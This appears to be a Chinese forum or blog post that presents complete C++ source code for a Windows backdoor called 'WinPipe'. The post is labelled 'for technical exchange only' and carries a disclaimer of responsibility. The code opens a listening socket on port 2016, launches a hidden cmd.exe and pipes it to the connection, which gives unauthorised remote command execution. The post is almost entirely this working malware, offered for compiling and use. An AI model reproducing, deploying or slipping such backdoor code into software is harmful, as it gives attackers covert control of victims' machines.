WinPipe后门程序代码示例（仅限技术交流）

具体怎么编译，生成执行程序，不懂得先学习C++程序代码编译和集成开发环境。

多的不说了，只有两个代码文件，一个头文件，一个源文件。不多说了，直接上干货。

（恶意使用，或者商用，后果自负，与本人无关。）

head.h

#pragma once

#ifndef WINVER                          // Specifies that the minimum required platform is Windows Vista.
#define WINVER 0x0600           // Change this to the appropriate value to target other versions of Windows.
#endif

#ifndef _WIN32_WINNT            // Specifies that the minimum required platform is Windows Vista.
#define _WIN32_WINNT 0x0600     // Change this to the appropriate value to target other versions of Windows.
#endif

#ifndef _WIN32_WINDOWS          // Specifies that the minimum required platform is Windows 98.
#define _WIN32_WINDOWS 0x0410 // Change this to the appropriate value to target Windows Me or later.
#endif

#ifndef _WIN32_IE                       // Specifies that the minimum required platform is Internet Explorer 7.0.
#define _WIN32_IE 0x0700        // Change this to the appropriate value to target other versions of IE.
#endif

#define WIN32_LEAN_AND_MEAN             // Exclude rarely-used stuff from Windows headers
// Windows Header Files:
#include <windows.h>

// Windows Socket Files:
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")

// C RunTime Header Files
#include <stdlib.h>
#include <malloc.h>
#include <memory.h>
#include <tchar.h>

class CThreadNode 
{
public:

	SOCKET m_Sock;
	HANDLE hPipe;
	CThreadNode() 
	{
		m_Sock = INVALID_SOCKET;
		hPipe = NULL;
	}
};

 main.cpp

#include "Head.h"


bool SocketInit()
{
	WSADATA wsaData={0};
	if ( WSAStartup(MAKEWORD(2, 2), &wsaData) == NO_ERROR )
	{
		return TRUE;
	}
	else
	{
		return FALSE;
	}
}

int SendData(SOCKET m_Sock, void *pBuf, DWORD dwBufLen)
{
	if ( m_Sock == INVALID_SOCKET || !pBuf || dwBufLen <= 0 ) 
	{
		return -1;
	}
	int iCurrSend = 0, offset = 0;
	do {
		iCurrSend = send(m_Sock, (char *)pBuf+offset, dwBufLen, 0);
		if ( iCurrSend <= 0 ) 
		{
			break;
		}
		dwBufLen -= iCurrSend;
		offset += iCurrSend;
	} 
	while ( dwBufLen > 0 );
	return offset;
}

BOOL bExit = FALSE;
#define RECV_BUF_LEN 1024*10
char szCmdBuf[MAX_PATH] = {0};

DWORD WINAPI ThreadInputProcess(LPVOID lpParam)
{
	CThreadNode tNode = *(CThreadNode *)lpParam;
	DWORD dwWrited = 0, dwRecvd = 0;
	char szBuf[MAX_PATH] = {0};
	BOOL bRet = FALSE;
	while ( TRUE ) 
	{
		dwRecvd = recv(tNode.m_Sock, szBuf, MAX_PATH, 0);
		if ( dwRecvd > 0 && dwRecvd != SOCKET_ERROR ) 
		{
			WriteFile(tNode.hPipe, szBuf, dwRecvd, &dwWrited, NULL);
		}
		else{
			closesocket(tNode.m_Sock);
			WriteFile(tNode.hPipe, "exit
", sizeof("exit
"), &dwWrited, NULL);
			CloseHandle(tNode.hPipe);
			bExit = TRUE;
			break;
		}
		Sleep(50);
	}
	return TRUE;
}

DWORD WINAPI ThreadOutputProcess(LPVOID lpParam)
{
	CThreadNode tNode = *(CThreadNode *)lpParam;
	char szBuf[RECV_BUF_LEN] = {0};
	DWORD dwReadLen = 0, dwTotalAvail = 0;
	BOOL bRet = FALSE;
	while ( !bExit ) {
		dwTotalAvail = 0;
		bRet = PeekNamedPipe(tNode.hPipe, NULL, 0, NULL, &dwTotalAvail, NULL);
		if ( bRet && dwTotalAvail > 0 ) {
			bRet = ReadFile(tNode.hPipe, szBuf, RECV_BUF_LEN, &dwReadLen, NULL);
			if ( bRet && dwReadLen > 0 ) {
				SendData(tNode.m_Sock, szBuf, dwReadLen);
			}
			Sleep(50);
		}
	}
	CloseHandle(tNode.hPipe);
	return TRUE;
}

BOOL StartBackdoorShell(UINT uPort)
{
	if ( !SocketInit() ) {
		return FALSE;
	}
	SOCKET m_ListenSock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	if ( m_ListenSock == INVALID_SOCKET ) {
		return FALSE;
	}
	sockaddr_in sServer = {0};
	sServer.sin_family = AF_INET;
	sServer.sin_addr.s_addr = htonl(INADDR_ANY);
	sServer.sin_port = htons(uPort);
	if ( bind(m_ListenSock, (sockaddr *)&sServer, sizeof(sServer)) == SOCKET_ERROR ) {
		return FALSE;
	}
	if ( listen(m_ListenSock, 5) == SOCKET_ERROR ) {
		return FALSE;
	}
	SOCKET m_AcceptSock = accept(m_ListenSock, NULL, NULL);
	// Create Pipe;
	CThreadNode m_ReadNode, m_WriteNode;
	STARTUPINFO si = {0};
	si.cb = sizeof(STARTUPINFO);
	PROCESS_INFORMATION pi = {0};
	DWORD dwThreadRead = 0, dwThreadWrite = 0;
	HANDLE hReadPipe1 = NULL, hWritePipe1 = NULL; // Input the command;
	HANDLE hReadPipe2 = NULL, hWritePipe2 = NULL; // Get the command results;
	HANDLE hThreadOutput = NULL, hThreadInput = NULL;
	SECURITY_ATTRIBUTES sa = {0};
	sa.nLength = sizeof(SECURITY_ATTRIBUTES);
	sa.lpSecurityDescriptor = NULL;
	sa.bInheritHandle = TRUE;

	if ( !CreatePipe(&hReadPipe1, &hWritePipe1, &sa, 0) || !CreatePipe(&hReadPipe2, &hWritePipe2, &sa, 0) ) {
		return FALSE;
	}
	m_ReadNode.m_Sock = m_WriteNode.m_Sock = m_AcceptSock;

	GetStartupInfo(&si);
	si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
	si.hStdInput = hReadPipe1;
	si.hStdOutput = si.hStdError = hWritePipe2;
	si.wShowWindow = SW_HIDE;
	TCHAR szCmdLine[MAX_PATH] = {0};
	GetSystemDirectory(szCmdLine, MAX_PATH);
	_tcscat_s(szCmdLine, MAX_PATH, _T("\cmd.exe"));
	if ( !CreateProcess(szCmdLine, NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi) )
	{
		return FALSE;
	}
	m_ReadNode.hPipe = hReadPipe2;
	hThreadOutput = CreateThread(NULL, 0, ThreadOutputProcess, &m_ReadNode, 0, &dwThreadWrite);
	m_WriteNode.hPipe = hWritePipe1;
	hThreadInput = CreateThread(NULL, 0, ThreadInputProcess, &m_WriteNode, 0, &dwThreadRead);

	HANDLE szHandles[] = { hThreadOutput, hThreadInput };
	WaitForMultipleObjects(2, szHandles, TRUE, INFINITE);
	return TRUE;
}
int APIENTRY _tWinMain(HINSTANCE hInstance,
	HINSTANCE hPrevInstance,
	LPTSTR    lpCmdLine,
	int       nCmdShow)
{
	StartBackdoorShell(2016);
	ExitProcess(0);
	return 0;
}